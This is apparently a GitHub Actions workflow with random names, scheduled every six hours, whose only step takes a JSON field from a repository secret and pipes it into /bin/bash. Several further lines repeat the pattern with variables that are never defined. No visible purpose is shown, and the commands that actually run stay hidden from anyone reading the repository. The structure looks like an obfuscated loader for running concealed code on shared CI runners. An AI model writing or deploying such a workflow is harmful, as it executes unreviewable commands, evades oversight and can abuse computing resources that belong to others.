name: lingnanren4678

on:
  workflow_dispatch:
  schedule:
    - cron: '21 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingnanren4678
        env:
          e71: ${{ secrets.e71 }}
        run: |
          echo $e71 | jq -r .zn680 | /bin/bash
          echo $i2823 | jq -r .khqe60 | /bin/bash
          echo $fxbj7 | jq -r .ilh699 | /bin/bash
          echo $hlw6 | jq -r .odbor2191 | /bin/bash
          echo $cmm8785 | jq -r .hxa90 | /bin/bash
          echo $d9386 | jq -r .scio05135 | /bin/bash

